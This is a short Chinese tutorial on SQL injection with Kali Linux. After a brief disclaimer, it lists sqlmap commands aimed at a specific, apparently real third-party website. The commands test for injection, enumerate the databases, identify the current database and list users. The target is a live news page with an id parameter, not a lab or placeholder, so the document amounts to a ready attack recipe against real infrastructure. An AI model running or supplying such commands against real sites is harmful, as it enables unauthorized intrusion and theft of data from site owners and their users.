使用kali完成sql注入
本文仅用于学术参考分享,如有侵权,请联系作者删除,请勿随意对网站进行sql注入
前期准备
1.kali虚拟机(自带sql注入所需工具)
2.能够进行注入的网站
实验步骤
1.查看是否可以sql注入
sqlmap -u ‘http://www.slmm90.com.tw/news.php?id=408%20’ GET
2.爆库
sqlmap -u ‘http://www.slmm90.com.tw/news.php?id=408%20’ --dbs
3.查看当前使用的是哪个库
sqlmap -u ‘http://www.slmm90.com.tw/news.php?id=408%20’ --current-db
4.查看当前users
sqlmap -u ‘http://www.slmm90.com.tw/news.php?id=408%20’ --users